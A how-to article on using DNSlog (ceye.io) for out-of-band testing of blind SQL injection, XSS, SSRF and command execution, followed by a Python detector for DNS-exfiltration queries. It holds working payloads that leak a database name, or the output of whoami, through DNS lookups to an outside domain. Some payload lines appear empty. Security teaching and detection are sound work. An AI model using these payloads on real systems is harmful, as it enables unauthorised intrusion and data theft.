How to make rational use of DNSLOG for non-echo security testing

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

Many newcomers are unclear about how to make rational use of DNSlog for security testing when there is no echo. To help with that, this article explains it in detail; anyone who needs it can read on and hopefully get something out of it.

When testing a website for security problems, some test commands produce no echo (no visible output). We can write scripts for blind injection, but some websites will block our IP address; an IP proxy pool gets around that, yet blind injection is still very inefficient. DNSlog injection exists to solve this.

Before using dnslog, we need to look at the backquote character:

Symbol: `

Name: backquote (back quotation mark), also called the grave accent

Position: on most keyboards this key is in the upper left corner, to the left of the number 1; do not confuse it with the single quotation mark.

What it does: the shell interprets a string enclosed in backquotes as a command line. When executed, the shell first runs that command line and then replaces the entire backquoted expression (including both backquotes) with its standard output.

The DNSlog echo test works as follows:

First of all, you need a domain name you can configure, such as ceye.io. Through the domain agent (registrar), set the nameserver of ceye.io to your own server A, and run a DNS server on A. Every query for ceye.io and its subdomains then goes to server A, where the domain name query requests can be monitored in real time, as shown below.

DNS leaves a log entry for every resolution. The technique is to read the resolution log of multi-level domain names to recover information.

To put it simply: place the information in a subdomain label of your own domain, make the target resolve it, and then read the log to get the information back.

The principle sounds abstract, so let's look at it through a practical example.

http://ceye.io is a free platform for recording dnslog. After registering, the control panel gives you a second-level domain name: xxx.ceye.io. When the injected information is placed in a third-level domain label, the backend log records it.

0x01 SQL blind injection

Take SQL blind injection as an example and look closely at the DNSlog injection process:

Blind injection through DNSlog relies on the load_file() function, so it usually requires root (FILE) privilege. The statement show variables like '%secure%'; shows which disks load_file() is allowed to read from.

1. When secure_file_priv is empty, files in any directory of any disk can be read.

2. When secure_file_priv is G:\, only files on drive G can be read.

3. When secure_file_priv is NULL, load_file() cannot load files at all.

This is configured in my.ini: with secure_file_priv="" load_file() can read files from any disk.

Execute on the mysql command line: select load_file('\\\\afanti.xxxx.ceye.io\\aaa'); where afanti stands for the result of the query to be injected.

Check the platform: the dnslog is recorded.

The load_file() function causes the UNC path to be resolved through DNS.

Using level 5 of sqli-labs:

Payload: ' and if((select load_file(concat('\\\\',(select database()),'.xxxxx.ceye.io\\abc'))),1,0)--+

SQL statement executed: SELECT * FROM users WHERE id='1' and if((select load_file(concat('\\\\',(select database()),'.xxxxx.ceye.io\\abc'))),1,0)

Check the dnslog record: the database name security has been queried:

0x02 XSS (no echo)

With blind XSS, the triggering browser is made to request a link we control. If the blind XSS fires, the platform shows a link access record like the following:

Payload: >

The src attribute makes the browser request our dnslog platform.

0x03 SSRF (no echo)

Payload:

0x04 Command execution (no echo)

When a domain name is pinged, it is looked up through recursive DNS, and at that moment the DNS query request can be seen on the backend. If the command really executes and the platform receives the record, the vulnerability does exist.

Linux

curl http://`whoami`.xxx.ceye.io

ping `whoami`.xxxx.ceye.io

Windows

ping %USERNAME%.xxx.ceye.io
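All four techniques above (0x01 to 0x04) leave the same trace on the defender's side: an outbound DNS query whose leading label carries data and whose suffix is an out-of-band platform. The following detector is an added example, not code from the article or from ceye.io; it scans constructed BIND-style query log lines, and the domain oast.example, the 24-character threshold and the sample lines are assumptions made for this illustration.

```python
import re

# OAST platforms to alert on: ceye.io is the one the article uses; oast.example is a constructed placeholder.
OAST_WATCHLIST = {"ceye.io", "oast.example"}
# Leading labels longer than this are rare in real host names but typical for carried data (assumed threshold).
MAX_LABEL_LEN = 24
# BIND-style query log line, constructed, e.g.: client 10.0.0.5#53211: query: security.xxxxx.ceye.io IN A + (10.0.0.2)
QUERY_RE = re.compile(r"client (?P<src>\d+\.\d+\.\d+\.\d+)#\d+.*?query: (?P<qname>\S+) IN (?P<qtype>\S+)")

def watchlist_hit(qname):
    """Return the watchlisted base domain that qname falls under, or None."""
    labels = qname.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in OAST_WATCHLIST:
            return ".".join(labels[i:])
    return None

def suspicious_labels(qname):
    """Leading labels that look like carried data rather than host names.
    The last two labels (registrable domain + TLD) are skipped; an approximation without a public-suffix list."""
    labels = qname.lower().rstrip(".").split(".")
    return [lab for lab in labels[:-2] if len(lab) > MAX_LABEL_LEN]

def analyze_qname(qname):
    reasons = []
    hit = watchlist_hit(qname)
    if hit:
        reasons.append(f"query to OAST platform {hit}")
    for lab in suspicious_labels(qname):
        reasons.append(f"oversized label of {len(lab)} chars may carry exfiltrated data")
    return reasons

def scan_query_log(text):
    """Return (source_ip, qname, reasons) for each flagged query in a BIND-style log."""
    findings = []
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if m and (reasons := analyze_qname(m["qname"])):
            findings.append((m["src"], m["qname"], reasons))
    return findings

# Constructed sample log: a benign lookup, a DNSlog lookup carrying the database name from the
# SQL injection section, and a long encoded label sent to an unknown collector domain.
SAMPLE_LOG = """\
19-Jan-2025 10:00:01.001 queries: info: client 10.0.0.5#53211: query: www.example.com IN A + (10.0.0.2)
19-Jan-2025 10:00:02.002 queries: info: client 10.0.0.7#41002: query: security.xxxxx.ceye.io IN A + (10.0.0.2)
19-Jan-2025 10:00:03.003 queries: info: client 10.0.0.7#41003: query: mfrggzdfmztwq2lknnwg23tpobyxe43uob2hs.collector.invalid IN A + (10.0.0.2)
"""
```

In production the watchlist would be fed from threat intelligence and the label check paired with a per-source rate limit, since a single long label is weak evidence on its own.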
